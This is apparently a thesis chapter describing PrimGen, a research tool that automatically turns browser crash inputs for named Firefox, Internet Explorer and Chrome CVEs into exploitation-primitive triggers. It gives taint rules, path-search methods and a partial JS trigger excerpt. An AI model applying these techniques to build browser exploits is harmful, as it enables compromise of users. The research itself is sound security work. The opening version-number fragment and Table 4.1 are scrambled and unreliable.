1 : ar-2.34 1 : cp-8.32 ar-2.25 cp-8.23 2 : objdump-2.34 2 : rm-8.32 1 : ar-2.25 1 : cp-8.32 ar-2.34 cp-8.23 2 : gprof-2.25 2 : mv-8.32 1 : objdump-2.34 1 : df-8.32 gprof-2.25 df-8.23 2 : ar-2.34 | 3: gprof-2.34 2 : ls-8.32 1 : gprof-2.25 1 : ls-8.23 gprof-2.34 df-8.32 2 : ar-2.25 2 : df-8.23 1 : objdump-2.34 1 : ls-8.32 nm-2.25 ls-8.23 2 : ar-2.34 | 3: nm-2.34 2 : df-8.32 1 : gprof-2.25 1 : ls-8.23 nm-2.34 ls-8.32 2 : nm-2.25 2 : df-8.23 1 : objdump-2.34 1 : rm-8.32 objdump-2.25 mv-8.23 2 : ar-2.34 2 : mv-8.32 1 : ar-2.25 1 : mv-8.23 objdump-2.34 mv-8.32 2 : nm-2.25 | 4: objdump-2.25 2 : rm-8.23 1 : readelf-2.34 1 : rm-8.32 readelf-2.25 rm-8.23 2 : objdump-2.34 2 : mv-8.32 1 : ar-2.25 1 : rm-8.23 readelf-2.34 rm-8.32 2 : nm-2.25 | 5: readelf-2.25 2 : mv-8.23 4 Towards Automated Generation of Exploitation Primitives for Web Browsers

Contents

4.1 Model and Assumptions ...... 89 4.2 Design ...... 93 4.2.1 Finding Sinks ...... 95 4.2.2 Program Paths ...... 96 4.2.3 Triggering Input ...... 102 4.2.4 Implementation Details ...... 103 4.3 Evaluation ...... 103 4.3.1 Exploitation Primitive Trigger (EPT) ...... 103 4.3.2 Fine Tuning ...... 106 4.4 Discussion and Limitations ...... 106 4.5 Related Work ...... 107 4.6 Conclusion ...... 108

Software vulnerabilities pose a severe threat in practice as they are the root cause behind many attacks we observe on the Internet on a daily basis. A few years ago, attackers shifted away from server-side vulnerabilities to client-side vulnerabilities. Nowadays, especially web browsers are an attractive target given their complexity (i.e., Mozilla Firefox contains about 18 million lines of code [154]) and large user base. Browsers incorporate many complex features including processing of different languages (e.g., various Markup languages, JavaScript (JS), WebGL, etc.) and interpreting many file formats (e.g., images, audio, video or Office files). As a

87 88 4. Towards Automated Generation of Expl. Primitives for Web Browsers result, browsers provide a large attack surface and security-critical vulnerabilities are found continuously. To counter such vulnerabilities, various mitigation strategies emerged [194] and were incorporated into browsers themselves and the underlying operating system to make exploitation of a given vulnerability as difficult as possible. As a result, the exploitation of a browser vulnerability became a time consuming, multi-step task: starting from (i) discovering the vulnerability, (ii) minimizing the crashing input, (iii) verifying exploitability, and (iv) building upon the crashing input to gain code execution or escalate privileges. Unfortunately, most of these tasks are commonly performed manually in practice. Hence, exploiting a browser vulnerability is nowadays a complex task and it is not uncommon that several man months are invested into creating a working exploit [189]. This is often necessary to prove that a given bug is indeed security-critical and has to be eliminated before victims are compromised and suffer financial or reputation loss, or other kinds of damages. To explain the underlying challenges, we first need to focus on the typical steps of a modern browser exploit. Usually, at a certain point in the exploit-development process, the developer is confronted with a state where she controls a CPU register with a value pointing to controlled memory. The contents of this memory region under her control can be influenced with heap spraying. The subsequent step is to put a lot of effort into manually debugging the program flow to find a desired action when the bug is triggered. This might be the propagation of controlled memory content into the instruction pointer register to divert the control-flow, or the propagation into a write instruction to alter fields of internal browser objects. This way, the exploit gains additional capabilities such as extended reading/writing of memory or escalated privileges due to an altered security flag. For example, ExpLib2 is a specifically prepared exploit plugin in form of a JavaScript (JS) library. It only requires a single memory write in order to gain complete remote code execution in Internet Explorer 11 [129, 41, 45]. Nonetheless, achieving even a single, illegitimate memory write can be difficult and time-consuming in practice. There is a line of work on automated exploit generation methods such as for example AEG [12] or Mayhem [39]. The general goal is to find exploitable bugs and automatically generate exploits for them. However, AEG focuses on simpler bug classes such as continuous, stack-based buffer overflows and format-string vulnerabilities. Due to improvements in software testing and exploit mitigations in the browser context, analysts focus on use-after-free, type confusion and uninitialized- variable bugs. Mayhem [39] also approaches automated exploit generation. It shares the limited set of bug classes with AEG, but supports analysis of binary executables. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 89

In this chapter, we address the open challenge of automatically creating exploit primitives (e.g., attacker-controlled reads and writes) and crafting exploitation primitive triggers for a given crashing input in web browsers. We present an automated analysis method that takes a JS/HTML file (i.e., template) that crashes a given browser instance as input, and modifies the JS objects in a way that the resulting JS file (i.e., exploitation primitive trigger) performs attacker-desired actions (i.e., exploit primitive), such as the above mentioned memory write. We developed our techniques on top of Mentalese, our binary analysis framework which incorporates several analysis techniques to achieve that degree of automation. We use the taint and pointer analysis of Mentalese to track the attacker- controlled data from the crashing input into sinks of interest (e.g., controlled memory writes or reads). This analysis yields execution paths which start at the control of a CPU register induced by the crashing input, and end in sinks where controlled input is involved in useful actions, e.g., an arbitrary memory write or controlling the instruction pointer. These candidate paths are symbolically evaluated to filter out unsatisfiable paths. Although browsers are very complex binaries, our approach does not suffer from common problems such as path explosion given that we perform symbolic execution only on selected program paths and not complete programs. The remaining paths are emulated with the attacker-controlled memory from the crashing input and this data is adjusted accordingly to be able to reach the end of the path, i.e, the according sink. Finally, memory maps are created based on the adjusted data. These serve as a base to generate scripts with JS objects, which the vulnerable browser can execute. As a result, the generated JS files perform the desired exploit primitive defined by the sink. To demonstrate the practical feasibility of the proposed method, we implemented a tool called PrimGen on top of Mentalese and conducted our evaluation on real-world browser vulnerabilities for Mozilla Firefox, Internet Explorer, and Google Chrome. Our tool identified 486 useful exploit primitives which enhance exploits with arbitrary Write-Where, Write-What-Where and EIP control primitives. We were able to generate 48 JS scripts which execute these primitives.

4.1 Model and Assumptions

Based on Mentalese, our goal is to present techniques that enable a high degree of automation for exploitation of software bugs in web browsers. It is not our goal to develop an attack to bypass recently introduced mitigations, nor to approach new 90 4.1. Model and Assumptions bug finding mechanisms. As such, our goal is to automate a critical exploitation step, namely the process starting from an attacker-influenced location in the target browser binary induced by a vulnerability, to a point where an attacker-desired action is conducted. We assume the presence of a memory corruption vulnerability that can be triggered by the attacker. The bug is not prepared and provides no useful primitive. However, we assume that a heap spray exists to provide changeable, but still unusable memory contents. Furthermore, we assume that only the crashing input (i.e., the bug trigger in JS) and the initial point of control is known to the attacker, e.g., a CPU register is controlled. We assume that the target process is protected by widely-used defenses like stack canaries, W ⊕ X, and ASLR as deployed by major operating systems. This work focuses on the automation of crafting useful primitives, rather than bypassing more sophisticated defenses. Thus, we consider defenses such as virtual table verification [197], Control-Flow Integrity (CFI) [1, 218, 220, 33] and process isolation (sandboxing) [143, 166] out of scope. Nevertheless, bypassing these features is usually performed after the attacker has already gained a sufficient amount of control which we attempt to automate.

Modern Vulnerability Exploitation

To better understand the exploitation process of a memory corruption vulnerability in web browsers, we divide it into several steps that are necessary to gain control of a vulnerable browser. In the following, we provide an overview and explicitly emphasize the different steps we attempt to automate.

1) Vulnerability discovery. Before being able to exploit a vulnerability in order to prove that it is security-critical, it has to be discovered in the first place. Nowadays, it is usually achieved with techniques such as fuzzing [208, 88], symbolic execution [39, 182], or manual code review. The outcome is usually an input test case which ideally triggers the vulnerability and allows further analyses. We assume this as a prerequisite for our approach.

2) Vulnerability test case preparation. Depending on the size and complexity of the vulnerability test case (i. e., an HTML or JS file), it might be necessary to (manually) minimize and alter the test case. From an exploitation perspective, a small vulnerability test case (VUT) ideally triggers the bug and crashes the target process in a deterministic way, given that this allows an easier investigation. A VUT 4. Towards Automated Generation of Expl. Primitives for Web Browsers 91

Binary > Mentalese SymbolicPath Exploration Execution Path Exploration

Dynamic Trace (VUT)

indirect call Runtime x x Control Point SAT ? Memory Dump Verify Template Fail C EPT

Figure 4.1: Architecture implemented by PrimGen.

is sometimes also called a crashing input. Based on the vulnerability type and the affected browser component, there might already be signs of attacker control. These include bogus register values or memory content usually provoking the crash. Hence, we define a VUT to be a user-controlled input which provides a first and basic control point in the program flow (i. e., CPU registers or memory contains attacker- controlled content). Our approach starts with a VUT that provides a control point (also called control source). This is the beginning of our automation approach.

3) Preparing attacker memory. Before an attacker exercises the vulnerability via the VUT, she usually prepares regions of memory which enable an illegitimate action with the bug later on. This is, for instance, the case for spatial memory errors such as buffer overflows. An attacker may utilize the browser’s scripting engine to create and place specific JS objects after an object with the buffer overflow vulnerability on the heap [157]. This serves the purpose of overwriting the specific object once the bug is triggered. Similarly, freed memory regions may be reclaimed by attacker-controlled objects to support temporal memory errors such as use-after-free bugs [93]. As soon as the vulnerability is triggered, the attacker operates on the prepared object with the dangling pointer. Another bug-class which may need prepared memory is the usage of uninitialized variables. If the attacker manages to fill the stack with controlled values, e.g., via stack spraying [87, 135], 92 4.1. Model and Assumptions the uninitialized variables are filled with controlled values when the bug triggers. This extends attacker control beyond the initial control point. Generally speaking, preparing of attacker memory happens before the vulnerability is triggered, and these preparations are normally performed with heap spray. Heap spraying can be seen as a black box as one heap spray usually works reliably on a browser across (minor) version updates. Our analysis is based on a VUT with an extended, basic heap spray as input. Starting from this state, we aim at modifying the to-be sprayed JS objects in order to extend attacker control from control sources to attacker sinks in the target program flow, as we explain next.

4) Exercising an attacker primitive. At this point in the exploit development process, the attacker has a VUT which (i) triggers the vulnerability, (ii) fosters basic control over register/memory, and (iii) enables further execution towards yet unknown program sinks. As soon as the vulnerable program executes beyond the initial control point, it operates on attacker-controlled memory prepared via, e.g., heap spray. The control flow is already illegitimately influenced, and furthermore, an action of the attacker’s choice should be exercised next. We name the program point where this specific action takes place attacker sink. The execution flow, starting at the control point and eventually landing in the attacker sink, is called exploitation primitive. Put differently, an exploitation primitive executes from the control point, whereby controlled data from prepared memory (e.g., heap spray) influences branches and directs the control flow towards intended attacker sinks. Ultimately, a sink performs the attacker’s desired action(s). We choose the following sinks as targets for exploitation primitives, mainly because they are necessities of subsequent steps such as arbitrary code execution:

• Write-Where (WrW): The attacker manages to propagate controlled data into a sink with a limited-write instruction such as an increment, decrement, arithmetic or bit-like operation of controlled memory. Expressed in x86 assembly, a popular example is inc [controlled]. Usually, this sink is used to change a data field such as a length field of an internal browser object. This object can then be misused to illegitimately read, write, or corrupt memory in the address space arbitrarily.

• Write-What-Where (WWW): This sink contains instructions which allow arbitrary memory writes, in which the attacker controls the value (val) and the destination (dst), e.g., mov [dst], val. Similarly, this sink serves to corrupt memory in order to be able to perform more malicious computations 4. Towards Automated Generation of Expl. Primitives for Web Browsers 93

in the target process. For example, if val is a pointer into a shared library, this sink may serve the purpose to create an information leak and bypass ASLR.

• Control over the Instruction Pointer (EIP): EIP sinks allow control over the instruction pointer: an indirect call with attacker-controlled values redirects the control flow. This is often possible in browsers at virtual function call sites such as for example call [controlled].

The main automation task we accomplish is to generate JS code which triggers an exploitation primitive, i. e., the execution of the program path between the control point and the attacker sink. Attacker-controlled data in the form of JS objects has to be carefully crafted such that the program executes this program path once the vulnerability is triggered. As a result, we generate JS/HTML files based on VUTs to perform the intended exploitation primitive. We call these result files exploitation primitive trigger (EPT). Usually, searching and finding a desired exploitation primitive, analyzing the corresponding program path, and crafting the data fields correctly is a cumbersome process, as this is mostly performed manually and such program paths may consist of many basic blocks. Our aim is to fully automate all parts of this step, as we explain in § 4.2.

5) Finalizing the exploit. Usually after an EPT executed, the attacker has a higher level of control within the browser process, either because she has overwritten a security flag and is able to run high-privileged JS [129], or is performing arbitrary computations via code-reuse techniques after gaining EIP control. Both are possible means to exploit a vulnerability in the OS kernel to further escalate privileges. However, we consider this step as future work and currently out of scope.

4.2 Design

In the following, we describe the design and overall architecture of our approach towards automating and assisting the process of exploitation in browsers as imple- mented by PrimGen. An overview of the architecture is shown in Figure 5.2. Our prototype is split into two main phases consisting of several components. 94 4.2. Design

1) Preprocessing. The preprocessing complies to the operations performed by the frontend of Mentalese (see Section 3.3). Since we operate on the whole target binary, our first step is to reconstruct the CFG of each function using off-the-shelf binary frameworks, transform it into JSON, and feed it into Mentalese. Each function is then lifted into SymIL which has the static single assignment (SSA) form. Finally, we collect data such as function entries, register uses/definitions, memory reads/writes, and control-flow information as presented in Table 3.1 and generate the Mental-IR (see Section 3.1.2). An extension on top of Mentalese implemented by PrimGen is to incorporate trace/control-flow and memory information obtained with dynamic analysis (debugger or tracer). This is achieved by executing the target program with the VUT in a debugger having a breakpoint set at the control point. Hence, a dynamic trace and memory dump is extracted as soon as the breakpoint is hit.

2) Postprocessing. The postprocessing complies to the operations performed by the backend of Mentalese plus extensions implemented by PrimGen. After having determined the locations of a control point, we start the taint analysis to find reachable sinks; based on this information, we form a graph that describes the flow of control from one basic block to another. With this graph in place, paths to our intended sinks are symbolically executed and filtered beforehand if they are not solvable. The remaining paths lead us to potential exploit primitives and data needs to be crafted to reach them. In this step, all constraints related to controlled data are collected and used to build memory maps; these maps provide an overview on how the objects need to be crafted. Using a memory dump that is acquired at the time where the control point is hit, we verify every satisfiable path that has a memory map attached. This is achieved in a platform-agnostic manner. The process can also be seen as an additional filtering layer. Finally, given a template (e.g., a VUT with a basic heap spray, see § 4.1), our prototype generates scripts to be fed into the browser (EPT). Depending on the binary (note that browsers are huge), the first phase might take up to several hours. Therefore, we extract only those functions in the binary that are reachable by the control point. If the analysis reaches a point where further functions are needed, they are added to our IR on demand. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 95

Control over the Instruction Pointer IPControl(taint_descr, color, bb, order, ctx) :- IndirectCall(base, disp, access, bb, order, ctx), Taint(base, disp, access, taint_descr, color, _, _, ctx). Write-Where WriteWhere(taint_descr, color, bb, order, ctx) :- Memory(_, "store", _, _, disp, bb, order, ctx), Register(_, base, "d", _, bb, order, ctx), Taint(base, -1, "R", taint_descr, color, _, _, ctx). Write-What-Where WriteWhatWhere(taint_descr, color, bb, order, ctx) :- WriteWhere(taint_descr, color, bb, order, ctx), Register(_, what_reg, "u", _, bb, order, ctx), Taint(what_reg, -1, "R", taint_descr, color, _, _, ctx). Indirect Call IndirectCall(base, disp, access, bb, order, ctx) :- Register (_ , f_ret_reg, "u" , _ , bb, order, ctx), match (" f_ret_ .*" , f_ret_reg ).

Figure 4.2: Rule Set: Tainted Sinks.

4.2.1 Finding Sinks

In the previous chapter, we presented how taint analysis is implemented by Mentalese. A taint analysis is incomplete without its security policies, i.e, sinks that are reached by taint. In the same manner on how we described the analysis derivatives and their transparent interplay due to our Datalog approach, we define our sinks. Once the Taint rules reach their fixpoint, we use a glue-rule as defined in Section 3.5.1 to define our sinks. We are interested in sinks that have the characteristics of a WrW/WWW, and EIP primitive. In Figure 4.2 we present a rule set of glue-rules to derive these sinks. The second rule looks for a controlled store, e.g., a memory cell value at base+disp where base is tainted. The Write-What-Where rule is glued with the Write-Where rule. We first look for a Write-Where primitive, and then check for a register- use (what_reg) that is tainted. The rule abstracts away the characteristics of the what-expression in a sense that we only care about what is used and what we control. For instance, the register-uses can be part of an equation where the property, equation, is ignored by the rule. The only information we are interested in is that we can write controlled data. 96 4.2. Design

The first rule states that we run into IP control if we have an indirect call, and the operands of that call described by (base,disp,access) are tainted. The IndirectCall literal can either be generated by the frontend of Mentalese by catching call-instructions and producing EDB facts, or we can use the backend and write a rule to derive them. For the latter choice, we can utilize SymIL extensions as presented in Section 3.3.2, in particular, the f_ret_* registers. We recall that these pseudo registers represent return values and we use them to mimic a call whose return value is written to a return-receiver in the caller context. Thus, whenever we see a f_ret_* pattern, we can look if a register name matches. This works well for indirect calls through registers, but increases complexity of the rule set once indirect call through memory derefences occur, as is the case for the x86 architecture. We have therefore decided to leave this burden to the frontend and extend Mentalese to generate IndirectCall facts.

Running Example

During our evaluation of CVE-2016-9079, a use-after-free in Firefox 50.0.1, our tool generated an input following a path to an indirect call. We think that this specific case is complex, yet easy enough to clarify the concepts of this work. Figure 4.4 illustrates our running example which we constantly refer to throughout this chapter. The figure shows three illustrations which we cover in the course of the next sections. For now, consider the assembly code along a path generated by PrimGen. The code runs from the control point at 0x107a00d4 into an indirect call sink at 0x101c0cb8. The value in ecx at 0x107a00d7 is the memory region that the attacker controls through a JS object. The interested reader finds the VUT code leading to the control point in Listings A.1 and A.2 in Appendix A. It is based on code of the corresponding Mozilla Bug Report [195].

4.2.2 Program Paths

Upon taint generation, we build a graph that represents how control flows from one basic block to another until it reaches a sink. We refer to this graph as Taint Propagation Graph (TPG) which is illustrated in Figure 4.3. Leaf nodes in this graph are tainted sinks. The edges are labeled with a (from, to) propagation property. For instance, ecx_2 in 0x107a00d4 is propagated to ecx in 0x11521448. Note, how ecx_2 in 0x107a00d4 is propagated along two calls its non subscripted counterpart ecx in 0x11521448. This is achieved with PassThrough rules which we introduced in Section 3.4.4. Please refer to Figure 4.4 to see the control flow between these two nodes. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 97

0x107a00d4

ecx_2, ecx

0x11521448

ecx_0, ecx ecx_0, ecx

ecx, edi_0 0x101c0c96 0x101c0d0e

edi_0, eax_1

edi_0, eax_12 edi_0, edx_2 edi_0, esi_7 0x101c0d2b 0x107d4ac6 0x107d4ab5 0x101c0ca8

esi_7, esi_1 ecx_8, ecx esi_1, ecx_8

0x104c0c4f 0x101c0cb4 0x101c0cab

esi_1, eax_8

Figure 4.3: Taint Propagation Graph (TPG) of our running example: leaf nodes are attacker sinks. 98 4.2. Design Memory Tree Structure into an indirect call sink. On the left side, the 0x107a00d4 at Memory Map . The arrows indicate the mapping to a controlled memory region. control point 0x101c0cb8 ): Path generated from a CVE-2016-9079 Running example ( Figure 4.4: assembly code is shownEach which generated is path executed is along associated the with path a into memory the map. sink All at offsets are relative to the base address. Each memory map is transformed into a tree structure. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 99

The Figure also clarifies that nodes in the TPG are not necessarily connected by an edge in the CFG leaving us with gaps between these nodes. The TPG can basically be seen as a forward slice from the control point to the aimed attacker sink. Our aim in this process is to generate paths between each node in the TPG to close these gaps. However, we might face hundreds of basic blocks that can lie in between these sliced nodes with conditions that contradict each other leading to unsatisfiable paths. We start our approach by generating paths ahead of time before we check for their satisfiability. This is done in a breadth-first search manner with respect to being realizable. A realizable path respects the call stack, i.e., when a function returns it continues on the right call site. We send these paths to the symbolic execution engine.

Symbolic Execution

To lighten the burden on the symbolic execution engine, we generate a trie data structure for all the paths that were sent. Paths can be represented as strings which allows us to use string searching algorithms to process the trie [3]. In each node of the trie, we additionally incorporate meta data that gives us information about whether the node kills the taint or it is satisfiable along with its state. We only save the states in the nodes when they are satisfiable. The idea behind this is to prioritize paths that reach the sink through basic blocks where controlled data is processed. This gives an attacker a valuable overview on how much she can influence along different paths to its corresponding sinks. Whenever we generate a path ahead of time we process the trie and see if it is satisfiable up to some prefix of the path. In this manner we avoid recomputing paths that have an unsatisfiable prefix. If a new path string is encountered, we update the trie and send the path to the symbolic execution engine.

Path Explosion

Since the number of paths can grow exponentially, we vary the gap size until we reach a given coverage of sinks or a specified number of generated paths. With gap size we refer to the maximum number of basic blocks that are allowed to lie between the nodes in the TPG. We encountered the best results in terms of speed and reasonable quality with a gap size between 15 and 20. Each path is sorted by its length and priority. Paths where we control the branch conditions have a higher priority and are processed first. To further cope with the path explosion, we skip calls to functions that do not touch any controlled data. We use heuristic approaches to skip calls in order to keep the paths as simple as possible and summarize them as follows: 100 4.2. Design

• The callee does not lead us to a specific location where controlled data flows into a desired sink.

• The call site is postdominated by the target location, in which case we reach the target location anyway.

• The call does not touch any controlled data.

The former two rules enforce call skipping even if the callee touches tainted data. This choice reduces complexity, however, it can leads to unpleasant scenarios. One of these scenarios were experienced for mshtml.dll (CVE-2014-0322) where we encountered an interplay between user controlled buffer and a sprayed heap buffer. Our system might—due to our choices above—generate input that crashes before we reach a controlled sink. In this case PrimGen puts the input in a queue for further processing once the validation of all inputs is done. To find the cause of conflict, we intercept the crash and investigate if any tainted data is involved in the crash where a function skip occurred. In this case the path generation for this specific case is repeated which include the skipped functions. To avoid the regeneration of existing path prefixes up to the point where the function is skipped, we cache each path in the trie. The path generation starts from the entry point of the skipped function until it reaches its call site in the caller. The paths are then stitched with the satisfiable path prefixes.

Memory Maps

Recall that we search for paths between the control point and an attacker sink. Attacker-controlled data by means of objects placed at predictable locations have to be crafted carefully, such that the program follows the path into the sinks to perform the wanted primitive. These paths are computed to prefer basic blocks which process controlled data. We symbolically execute paths between source and sinks and gather constraints that are dependent on controlled data. Paths that run into unsatisfiable conditions are discarded. Based on the constraints, we build a memory map along with possible minimum and maximum values to be stored into the corresponding memory cells and which preserve the satisfiability of the path. We further incorporate metadata into each memory cell to keep track of instructions which introduced the constraints. This procedure is best explained by example and we refer to our running example illustrated in Figure 4.4. Recall that the value in ecx at 0x107a00d7 is the memory region that the attacker controls through a JS object. At offset 0xac, a dereference 4. Towards Automated Generation of Expl. Primitives for Web Browsers 101

occurs and its value has to be equal to 1 to satisfy the jump condition to 0x107a00ed. The memory map on the right side shows this coherence. The base address of the map is set to 0xd0000f54 in our case, but can be set to any value afterwards. The corresponding addresses in the cells are rebased accordingly. At 0x11521448, the value of ecx (offset 0 in the map) is dereferenced, loaded into ecx which flows into edi at 0x101c0c9a where it serves as a base address for the next jump condition. Note that this value is again a memory region controlled by the attacker. The value at offset 0x10ac=0x1094+0x18, can be set to 0x5 or 0xff as indicated in the map through the min and max values. These min/max values usually describe a range from which we can pick a value; however, in this case, the test instruction performs an and operation which restricts the value to be chosen. To avoid bad characters which can be induced by zeros, we usually choose the max value. For some memory cells, as for the one used in the sink, the range between min and max is the maximum word size (0xffffffff), depending on whether we are running a 32 or 64bit process. Whenever we encounter such a range, we use it as an indicator to place an address at that cell that points back into a attacker controlled area. However, we also need to account for loop conditions that we might control. Setting the value to high might lead the execution to run forever. We use a weak topological sorting algorithm that partitions each loop in the process of topological sort [24]. This allows us to spot controlled data that is processed in the head of a loop. If controlled data runs into a flag condition it indicates that we control the loop condition. In this case we need to find a suitable value. Each memory map is transformed into a tree structure which simplifies the process of following dereference chains. The base is the root of the tree and each entry in the map is a node. Nodes are connected with an edge if a dereference occurs on that cell that points to another cell (see Figure 4.4).

Verify

Due to the lack of context (state) information, each satisfiable path needs to undergo a verification process. In order to verify the paths in a platform-agnostic manner, we use a dump that is acquired at the time where we hit the control point. Usually this is the moment where, for instance, the heap spray has already occurred. We mimic the process of different heap spray routines by setting the memory according to our memory maps. In an emulation process we examine if our memory settings drive the execution into the desired primitive. Paths that do not fulfill this property are filtered out. 102 4.2. Design

4.2.3 Triggering Input

To generate code that triggers a given exploitation primitive, an attacker has to deliver a manually crafted template file. This template file contains the VUT, and eventually, a routine to prepare attacker memory which is usually achieved through heap spraying. The code snippet in Figure 4.5 shows an excerpt of an EPT for our running example generated from a template file.

1 function prepare_memory(){...}

2 function VUT(){...}

3 function set(offset, value){...}

4 base_addr = ...

5 /* automatically generated code*/

6 function gen(){

7 set(0x70, base_addr+0x110);

8 set(0xac, 0x1);

9 set(0x0, base_addr+0x1094);

10 set(0x10ac, 0xff);//0x1094+0x18=0x10ac

11 set(0x10a8, base_addr+0x20ac);//0x1094+0x14=0x10a8

12 set(0x20ac, base_addr+0x2f74);//0x20ac+0x0=0x20ac

13 set(0x30ac, base_addr+0x220);//0x2f74+0x138=0x30ac

14 }

Figure 4.5: JS EPT excerpt.

The VUT and the memory preparation stabilizes control over the memory regions through JS objects. Our memory tree structures from the previous step are used to generate a recipe on how the objects need to be crafted to trigger the attacker’s sink. The gen function is generated by PrimGen and delivers this recipe. Again, recall our example illustrated in Figure 4.4: For offset 0xac, PrimGen generates set(0xac, 0x1), which conforms to line 8 in Figure 4.5. The set function invocations write the values to the corresponding offsets in user controlled memory. When heap spraying is involved, the gen procedure is embedded into the heap spraying routine. Line 9 represents the connection from 0xd0000ff54 to the node with offset 0x0 in our memory tree. The memory tree has two outgoing edges to 0x10ac and 0x10a8 which conforms to lines 10 and 11, respectively. At offset 0x70 we have an unconstrained value, in which case an unused address to user controlled memory is chosen. The number of lines generated depend on the complexity of the path, i.e., the length, the number of constraints referring to controlled data, interplay with heap and eventually user defined buffers. A full presentation of the VUT, template and generated EPT can be found in Appendix A. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 103

4.2.4 Implementation Details

PrimGen is built on top of Mentalese. We used IDA Pro to retrieve the CFGs of each function in the binary and feed it into Mentalese. Recall that the input needs to follow a simple JSON encoding. Thus, any control flow recovery tool can be applied and interfaced with Mentalese. Paths that we generate undergo a satisfiability check through symbolic execution. We implemented our symbolic execution component on top of ANGR [182], a platform-agnostic binary analysis framework. The reason for this choice was its capability to expose an API for 1) skipping functions, 2) loading memory dumps, and 3) emulating code via Unicorn. Once we generate the paths between source and sinks, as described in Section 4.2.2, we force the symbolic execution engine to follow one path at a time and check for its satisfiability. ANGR has support for the Unicorn engine, an QEMU based emulator which we use for our verification procedure. We feed a dump into ANGR, set the memory values according to our memory maps, and start the emulation process until we hit our sink. This is done for every sink and every satisfiable path that hits the sink. If this procedure is successful, corresponding templates are used to generate EPT scripts.

4.3 Evaluation

We evaluate our system on a corpus of several CVE cases which target the browsers Internet Explorer, Mozilla Firefox and Google Chrome. For each test case we used an existing proof-of-concept which we refer to as the original PoC. We used these original PoCs as ground truth to verify if we can trigger the same attacker sinks. We used the VUTs to determine attacker-controlled data at the first dereferenced move into a CPU register. PrimGen is then fed with the VUT, the binary, and a template file. Our measurements are performed on a machine running with Intel Xeon CPUs E5-2667 @ 2.90GHz, 96GB RAM and 12 cores.

4.3.1 Exploitation Primitive Trigger (EPT)

PrimGen is able to generate several EPT scripts for all CVE case studies. Table 4.1 summarizes our analysis results. Overall we found 486 different and unique ways to trigger exploitation primitives for which 48 usable EPT scripts were generated. These 486 ways are alternatives to trigger the primitives and diverges from the original PoC. For CVE-2016-9079 and CVE-2014-1513, we achieved full coverage of all attacker sinks. Note that some EPT inputs trigger the same primitive, which explains the 104 4.3. Evaluation

30 xul.dll 46.0.1.5966 mshtml.dll 10.0.9200.16384 25 chrome 35.0.1916.153 xul.dll 50.0.1.6171

20

15

10

5

0 0 10 20 30 40 50

Figure 4.6: Y-Axis:Number of satifiable paths which lead to an attacker sink; X-Axis: Path length (number of basic blocks).

higher number of EPTs in CVE-2016-9079. In this case the system generated 33 EPT scripts that reach the sinks. Since WWW primitives are also WrW primitives, the number of sinks are equal in some case studies. From the specific control point we gain through its VUT, the mshtml.dll turns out to be the most affected. We discovered that many sinks reside deep in the interprocedual CFG, unreachable by our path analysis to cover all of them in a reasonable time. For the same reason, we do not reach the original PoC sink in xul.dll 46.0.1.5966 and xul.dll 44.0.2.5884 as shown in Table 4.1. However, PrimGen found alternative and simpler ways to expand control into desired attacker sinks. Figure 4.6 shows the satisfiable paths relative to the path length (number of basic blocks). It indicates that paths reaching our sinks are shallow. We argue that these are the more desirable options for an attacker as it simplifies her efforts, but we also acknowledge the fact that there is space for improvement. Note that these paths are checked for their satisfiability which are further filtered through a verification process.

Please refer to https://github.com/RUB-SysSec/PrimGen for all the data that were generated and used for our evaluation. To clarify the interplay of the JavaScript components, we listed them in Appendix A for our running example that is presented in Figure 4.4. 4. Towards Automated Generation of Expl. Primitives for Web Browsers 105 2 7 4 9 . . . . 25 04 49 3 5 4 . . . . The 16 24 18 72 control point   − X X X X 15 3 1 2 1 1 1 / / / / / / / 3 0 2 1 1 2 12 / / / / / / / 119 1889 49 28 25 1 4147 2 486 2 48 0 21 1 618 2 40 199 33 1 3 9 0 / / / / / / / 9 9 0 1 6 / / / / / 125 150 / / 79 153 8 . 16384 27 . 588459666171 17 17 9 0 1 . . . . 2 1 1 . . . 1916 27 0 0 0 . 9200 . . . . 0 . 0 . 44 46 50 35 10 . The fifth column shows the number of satisfiable paths which lead to the attacker sinks. Among these xul.dll xul.dll xul.dll chrome mozjs.dll mshtml.dll EIP/WWW/WrW generated EPTs, listed in the sixth column. The seventh column lists the number of attacker sinks we cover through EPTs, Overview of the affected CVEs and our analysis results: The fourth column shows the number of alternative exploit primitives Taint analysis results for case studies. The third column lists the number of reachable functions from the Advisory IDCVE-2014-0322CVE-2014-1513 Tainted ILCVE-2016-1960 InstructionsCVE-2016-2819 Reachable FunctionsCVE-2016-9079 6665 FunctionsCVE-2014-3176 Touching Taint 85 Time 881 897 215 1747 10655 6680 17571 15691 12154 2505 320 15 74 72 17 101 115 39 16 11 102 51 PrimGen Advisory IDCVE-2014-0322 CVE-2014-1513 CVE-2016-1960 BinaryCVE-2016-2819 CVE-2016-9079 V ersionCVE-2014-3176 Total Sinks SAT EP T Sinks covered P oC covered V erify paths, denoted in the same fashion as in the fourth column. The eight column depicts if the original PoC sink is triggered by any of our inputs. fourth column shows theanalysis. number of functions which operate on controlled data. The last column lists the timings (in seconds) for the taint The last column shows the verification time in minutes for satisfiable paths. Table 4.1: Table 4.2: (sinks) denoted as 106 4.4. Discussion and Limitations

4.3.2 Fine Tuning

In some scenarios the address of the control point is not sufficient. We encountered this issue for CVE-2016-1960. The following assembly snippet shows the correspond- ing basic block in xul.dll with the address of the control point at 0x1010760e: 0x10107601 mov ecx, [edi+38h] 0x10107604 mov eax, [edi+30h] 0x10107607 lea edx, [eax+ecx*4] 0x1010760a mov [esp+18h+var_4], edx 0x1010760e mov edx, [edx] ;controlled

Starting at 0x1010760e and using taint analysis alone leaves us with no sinks. This example, presents a scenario we already visited in Section 3.5.1 where we achieved higher precision with a pointer analysis. If we cannot derive any pointer information with regards to a memory dereference at the control point—like edx in our example—then we run the taint analysis from that point backwards. Here, we use the backward slicer of Mentalese without tracking control dependencies. The analysis stops at a dereference: In this case we encounter edi+0x38 and edi+0x30, both of which are tainted. The base is treated as a pointer that points to an unknown location. Any aliased location derived by the pointer analysis gets tainted. This expands the facts in Mental-IR about controllable data, which is transparently adapted by all algorithms.

4.4 Discussion and Limitations

